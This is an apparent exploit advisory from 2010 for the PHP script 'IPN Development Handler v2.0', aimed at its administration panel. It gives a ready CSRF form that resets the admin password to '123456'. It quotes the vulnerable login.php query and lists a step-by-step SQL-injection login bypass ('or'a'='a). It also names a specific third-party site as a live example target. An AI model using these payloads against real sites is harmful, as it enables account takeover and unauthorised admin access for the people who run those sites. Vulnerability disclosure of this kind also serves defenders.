IPN Development Handler v2.0 Multiple Vulnerabilities

2010-12-23 10:15:21

IPN Development Handler v2.0 CSRF (Change Admin Account)
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################


===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="s1" value="Update"/>
</form>

</body>
</html>

####################################################################

IPN Development Handler v2.0 Auth Bypass
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################

===[ Vulnerability ]===
Source Code path/siteadmin/login.php

if(isset($_POST[s2]))
{
$MyUsername1 = strip_tags($_POST[username1]);
$MyPassword1 = strip_tags($_POST[password1]);

if(empty($MyUsername1) || empty($MyPassword1))
{
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";
}
else
{
//check the login info if exists
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";

$r1 = mysql_query($q1);

if(!$r1)
{
echo mysql_error();
exit();

===[ Exploit ]===

1- Go to Siteadmin [www.site.com/siteadmin/login.php]
2- join code Auth Bypass in Username & Password
3- Username: 'or'a'='a
Password: 'or'a'='a

===[ Example ]===
http://ashishmonga.com/siteadmin/login.php

Username: 'or'a'='a
Password: 'or'a'='a

####################################################################



<!-- Dynamic page generated in 0.045 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2010-12-23 09:15:15 -->

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.